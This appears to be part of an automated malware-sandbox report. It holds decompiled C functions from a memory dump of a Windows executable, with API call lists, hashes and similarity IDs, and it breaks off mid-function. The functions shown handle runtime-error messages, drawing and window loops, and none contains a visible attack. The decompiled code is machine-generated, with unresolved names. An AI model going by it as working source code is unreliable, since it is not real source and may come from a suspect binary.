                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  • Opcode ID: e2c7095f3cbe23678004372aabea60339decc568a0916becd189fb88d87f9d5c
                                  • Instruction ID: e111454762a5c55b2c2444d7b48863253165006150e175b965a33504c5a6bebd
                                  • Opcode Fuzzy Hash: e2c7095f3cbe23678004372aabea60339decc568a0916becd189fb88d87f9d5c
                                  • Instruction Fuzzy Hash: BA1126757013246FD720CF61AD40BA7B7E8EB16320F41053BED65972A0D3B4A8448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403C94, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00403C94(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x44f048 == 0) {
					if( *0x44d030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x44f21c == 0xd7b2 &&  *0x44f224 > 0) {
						 *0x44f234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D1C, 2,  &_v4, 0);
				}
			}





                                  0x00403c9c
                                  0x00403cfc
                                  0x00403d0c
                                  0x00403d0c
                                  0x00403d12
                                  0x00403c9e
                                  0x00403ca7
                                  0x00403cb7
                                  0x00403cb7
                                  0x00403cd3
                                  0x00403cf4
                                  0x00403cf4

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62,?,?,?,00000001,00403E02,004027CB,00402813,?,00000000), ref: 00403CCD
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62,?,?,?,00000001,00403E02,004027CB,00402813), ref: 00403CD3
                                  • GetStdHandle.KERNEL32(000000F5,00403D1C,00000002,0044C944,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62), ref: 00403CE8
                                  • WriteFile.KERNEL32(00000000,000000F5,00403D1C,00000002,0044C944,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62), ref: 00403CEE
                                  • MessageBoxA.USER32 ref: 00403D0C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  • Opcode ID: 46f79a6cc78add50d339f47e7fd077fb8e4176df9ce279d288f4fcb92a48c3fc
                                  • Instruction ID: 6179543e96d115fbef07bca126a5206adf6b307dfac31fa16d1f0d56014ecb8d
                                  • Opcode Fuzzy Hash: 46f79a6cc78add50d339f47e7fd077fb8e4176df9ce279d288f4fcb92a48c3fc
                                  • Instruction Fuzzy Hash: 27F02B69A8434035F620BBA05D07F8B295C5785F19F2005BFB220F60E387FC49C9962D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438D54, Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E00438D54(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E004388F4(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E0041F450(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E00420788(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041C6CC( *((intOrPtr*)(E0041FA18( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E004120F0(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E0041FA18( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041CA70(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E0041CD58(E0041FA18( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00438A30(_t118));
						L00421A90();
						E004120F0(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E0041CD58(E0041FA18( *((intOrPtr*)(_t118 + 0x54))));
						E0041C6CC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E0041CD58(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00405FA8();
						E0041C6CC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E0041CD58(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00405FA8();
						return _t96;
					}
					_push(_a8);
					_push(E00438744(_t142));
					E00438D2C(_t118, _t142);
					_push(E00438744(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E0041CD58(__ecx));
					_push(_v8);
					_t117 = E00438A30(_t118);
					_push(_t117);
					L00421A90();
					return _t117;
				}
				return _t46;
			}




















                                  0x00438d54
                                  0x00438d5d
                                  0x00438d5f
                                  0x00438d62
                                  0x00438d66
                                  0x00438d6d
                                  0x00438d73
                                  0x00438d77
                                  0x00438dbd
                                  0x00438dc1
                                  0x00438dcf
                                  0x00438dd1
                                  0x00438dd8
                                  0x00438de4
                                  0x00438dec
                                  0x00438dee
                                  0x00438dee
                                  0x00438e01
                                  0x00438e15
                                  0x00438e1d
                                  0x00438e21
                                  0x00438e26
                                  0x00438e27
                                  0x00438e2c
                                  0x00438e2e
                                  0x00438e30
                                  0x00438e32
                                  0x00438e34
                                  0x00438e36
                                  0x00438e38
                                  0x00438e47
                                  0x00438e4b
                                  0x00438e53
                                  0x00438e54
                                  0x00438e70
                                  0x00438e82
                                  0x00438e8d
                                  0x00438e99
                                  0x00438ea1
                                  0x00438ea9
                                  0x00438eae
                                  0x00438eb3
                                  0x00438eb5
                                  0x00438eba
                                  0x00438ebe
                                  0x00438ec2
                                  0x00438ec7
                                  0x00438ecb
                                  0x00438ecb
                                  0x00438ecc
                                  0x00438ecd
                                  0x00438ece
                                  0x00438edb
                                  0x00438ee7
                                  0x00438eef
                                  0x00438ef7
                                  0x00438efc
                                  0x00438f01
                                  0x00438f03
                                  0x00438f08
                                  0x00438f0c
                                  0x00438f10
                                  0x00438f14
                                  0x00438f15
                                  0x00438f18
                                  0x00438f19
                                  0x00438f1a
                                  0x00000000
                                  0x00438f1a
                                  0x00438d7c
                                  0x00438d85
                                  0x00438d88
                                  0x00438d92
                                  0x00438d93
                                  0x00438d95
                                  0x00438d9a
                                  0x00438d9e
                                  0x00438da6
                                  0x00438daa
                                  0x00438dad
                                  0x00438db2
                                  0x00438db3
                                  0x00000000
                                  0x00438db3
                                  0x00438f25

                                  APIs
                                  • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00438DB3
                                  • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00438E54
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00438EA1
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00438EA9
                                  • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00438ECE
                                    • Part of subcall function 00438D2C: 73452240.COMCTL32(00000000,?,00438D8D,00000000,?), ref: 00438D42
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: 73452430Color$73452240E897Text
                                  • String ID:
                                  • API String ID: 3108427945-0
                                  • Opcode ID: 3fb5929c47e40831b9abf54c2eccca1b95876170b1eb516a9e2648754ac12d04
                                  • Instruction ID: 898f52912f8c2648505c1d19fcd2bf90d42932389bcfd37d16eb48ff35963739
                                  • Opcode Fuzzy Hash: 3fb5929c47e40831b9abf54c2eccca1b95876170b1eb516a9e2648754ac12d04
                                  • Instruction Fuzzy Hash: 09512B71340204ABCB40EF6DDDC2F9E77ADAF08304F10116AB914EB296CA78EC459B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00447DA8, Relevance: 12.1, APIs: 8, Instructions: 144windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00447DA8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x448070);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E0042A750();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x44df00; // 0x41a2b8
					E00405910(_t50,  &_v36);
					E0040B070(_v36, 1);
					E0040384C();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x44fbb0; // 0x2191714
				E0044A248(_t56);
				_push(_t127);
				_push(0x448053);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x44dc24; // 0x0
				_v20 = _t60;
				_t61 =  *0x44fbb4; // 0x2191320
				_t62 =  *0x44fbb4; // 0x2191320
				E004135A0( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t65 =  *0x44fbb4; // 0x2191320
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x44fbb4; // 0x2191320
				_v22 =  *((intOrPtr*)(_t66 + 0x44));
				_t68 =  *0x44fbb4; // 0x2191320
				E00449278(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t70 =  *0x44fbb4; // 0x2191320
				_v28 =  *((intOrPtr*)(_t70 + 0x48));
				_v16 = E00442180(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x448031);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00447CF8(_v8);
				_push(_t127);
				_push(0x447f90);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E004325A4(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x44fbb0; // 0x2191714
					E0044B054(_t80, _t124, _t125);
					_t82 =  *0x44fbb0; // 0x2191714
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E00447C58(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E004325A4(_v8), 0xb001, 0, 0);
				_t90 = E004325A4(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x447f97);
				return E00447CF0();
			}





























                                  0x00447da8
                                  0x00447da8
                                  0x00447da8
                                  0x00447da9
                                  0x00447dab
                                  0x00447dae
                                  0x00447daf
                                  0x00447db2
                                  0x00447db5
                                  0x00447dba
                                  0x00447dbb
                                  0x00447dc0
                                  0x00447dc3
                                  0x00447dc6
                                  0x00447dd2
                                  0x00447dfb
                                  0x00447e00
                                  0x00447e0f
                                  0x00447e14
                                  0x00447e14
                                  0x00447e20
                                  0x00447e2e
                                  0x00447e2e
                                  0x00447e33
                                  0x00447e38
                                  0x00447e3d
                                  0x00447e44
                                  0x00447e45
                                  0x00447e4a
                                  0x00447e4d
                                  0x00447e53
                                  0x00447e5f
                                  0x00447e62
                                  0x00447e67
                                  0x00447e6a
                                  0x00447e72
                                  0x00447e7c
                                  0x00447e81
                                  0x00447e89
                                  0x00447e8c
                                  0x00447e95
                                  0x00447e9b
                                  0x00447ea0
                                  0x00447ea5
                                  0x00447ead
                                  0x00447eb7
                                  0x00447ebc
                                  0x00447ebd
                                  0x00447ec2
                                  0x00447ec5
                                  0x00447ecb
                                  0x00447ed2
                                  0x00447ed3
                                  0x00447ed8
                                  0x00447edb
                                  0x00447ef0
                                  0x00447efa
                                  0x00447f00
                                  0x00447f00
                                  0x00447f05
                                  0x00447f0a
                                  0x00447f16
                                  0x00447f31
                                  0x00447f36
                                  0x00447f36
                                  0x00447f18
                                  0x00447f1b
                                  0x00447f1b
                                  0x00447f3e
                                  0x00447f44
                                  0x00447f48
                                  0x00447f5d
                                  0x00447f65
                                  0x00447f73
                                  0x00447f77
                                  0x00447f77
                                  0x00447f7c
                                  0x00447f7f
                                  0x00447f82
                                  0x00447f8f

                                  APIs
                                  • GetCapture.USER32 ref: 00447E19
                                  • GetCapture.USER32 ref: 00447E28
                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00447E2E
                                  • ReleaseCapture.USER32(00000000,00448070), ref: 00447E33
                                  • GetActiveWindow.USER32 ref: 00447E5A
                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00447EF0
                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00447F5D
                                  • GetActiveWindow.USER32 ref: 00447F6C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID:
                                  • API String ID: 862346643-0
                                  • Opcode ID: 69d29f9294f3bb6aa13494bcb80e43d70164ab4c77b805e4b36a31d6237639db
                                  • Instruction ID: 53852f02c106b836b00ca19f430d6591e641216b35f656d96903cccaad350bbd
                                  • Opcode Fuzzy Hash: 69d29f9294f3bb6aa13494bcb80e43d70164ab4c77b805e4b36a31d6237639db
                                  • Instruction Fuzzy Hash: 36513C34A10244EFE710EF69C996B5E77F1EF4A704F1140B9F504A76A1D778AE05CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004305E0, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004305E0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E0042A82C(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E004325A4(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E004325A4(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E0042A82C(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0042D05C(_t82, _t99, 0x14, 0);
				E0042D05C(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00413524( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E004305E0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                  0x004305eb
                                  0x004305ed
                                  0x004305ef
                                  0x004305fb
                                  0x00430605
                                  0x00430617
                                  0x0043061c
                                  0x00430620
                                  0x00430635
                                  0x0043064f
                                  0x00430654
                                  0x00430659
                                  0x0043065b
                                  0x00430662
                                  0x00430662
                                  0x00430637
                                  0x00430637
                                  0x0043063e
                                  0x0043063e
                                  0x00430669
                                  0x0043067b
                                  0x0043068a
                                  0x00430697
                                  0x004306af
                                  0x004306af
                                  0x004306bf
                                  0x004306cf
                                  0x004306d4
                                  0x004306dc
                                  0x0043071b
                                  0x00430720
                                  0x00430725
                                  0x00430731
                                  0x004306de
                                  0x004306e1
                                  0x004306e4
                                  0x00000000
                                  0x00000000
                                  0x004306e7
                                  0x004306ea
                                  0x004306f1
                                  0x004306fa
                                  0x004306ff
                                  0x00430703
                                  0x0043070e
                                  0x0043070e
                                  0x00430713
                                  0x00430716
                                  0x00430716
                                  0x00430716
                                  0x00000000
                                  0x004306f1

                                  APIs
                                  • SaveDC.GDI32 ref: 004305F6
                                    • Part of subcall function 0042A82C: GetWindowOrgEx.GDI32(?), ref: 0042A83A
                                    • Part of subcall function 0042A82C: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042A850
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00430617
                                  • GetWindowLongA.USER32 ref: 0043062D
                                  • GetWindowLongA.USER32 ref: 0043064F
                                  • SetRect.USER32 ref: 0043067B
                                  • DrawEdge.USER32(?,?,?,00000000), ref: 0043068A
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004306AF
                                  • RestoreDC.GDI32(?,?), ref: 00430720
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: ef9575348ec2406790e3cac31896200a622501cb9a75c05b3c6e147418799f12
                                  • Instruction ID: c13df65c76a784b37967d26beec2acafc9f571f3b084919c196f5d570f9368b5
                                  • Opcode Fuzzy Hash: ef9575348ec2406790e3cac31896200a622501cb9a75c05b3c6e147418799f12
                                  • Instruction Fuzzy Hash: 5D416471B00114ABDB14EAA9CC91FAF77A8AF48314F10416AFA05EB386DB7DDD118798
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D684, Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E0041D684(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004028B8(_t24, 0x40,  &_v1032);
				_push(0);
				L004062C0();
				_v8 = _t25;
				_push(_t54);
				_push(0x41d781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00406058();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406080();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406080();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406080();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406080();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406080();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E0041D788);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L004064F8();
				return _t29;
			}

















                                  0x0041d685
                                  0x0041d68e
                                  0x0041d697
                                  0x0041d6ab
                                  0x0041d6b0
                                  0x0041d6b2
                                  0x0041d6b7
                                  0x0041d6bc
                                  0x0041d6bd
                                  0x0041d6c2
                                  0x0041d6c5
                                  0x0041d6c8
                                  0x0041d6ca
                                  0x0041d6cd
                                  0x0041d6ce
                                  0x0041d6d3
                                  0x0041d6d8
                                  0x0041d6e4
                                  0x0041d6e5
                                  0x0041d6e7
                                  0x0041d6ec
                                  0x0041d6ed
                                  0x0041d6fc
                                  0x0041d758
                                  0x0041d759
                                  0x0041d75e
                                  0x0041d762
                                  0x0041d763
                                  0x0041d6fe
                                  0x0041d704
                                  0x0041d705
                                  0x0041d70c
                                  0x0041d710
                                  0x0041d711
                                  0x0041d724
                                  0x0041d725
                                  0x0041d72a
                                  0x0041d72e
                                  0x0041d72f
                                  0x0041d73a
                                  0x0041d73b
                                  0x0041d73d
                                  0x0041d742
                                  0x0041d743
                                  0x0041d743
                                  0x0041d6fc
                                  0x0041d76a
                                  0x0041d76d
                                  0x0041d770
                                  0x0041d775
                                  0x0041d778
                                  0x0041d779
                                  0x0041d77b
                                  0x0041d780

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041D6B2
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041D781,?,00000000), ref: 0041D6CE
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041D781,?,00000000), ref: 0041D6ED
                                  • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041D781,?,00000000), ref: 0041D711
                                  • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041D781), ref: 0041D72F
                                  • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0041D743
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041D781,?,00000000), ref: 0041D763
                                  • 72E7B380.USER32(00000000,?,0041D788,0041D781,?,00000000), ref: 0041D77B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: aa5f769936e66e02a718509b821573dc37915db1f5b611c73005b37768b1ff2d
                                  • Instruction ID: 137a3a726aca79937dae68fdff2244ab0ed3d4b961df9118b1154d5a56232b53
                                  • Opcode Fuzzy Hash: aa5f769936e66e02a718509b821573dc37915db1f5b611c73005b37768b1ff2d
                                  • Instruction Fuzzy Hash: 982186F1A40208AEDB10DBA5CD81F9E73ACEB08704F5104A6FB49F71C1D6799E548B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043B684, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0043B684(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x43b8df);
				_push( *[fs:eax]);
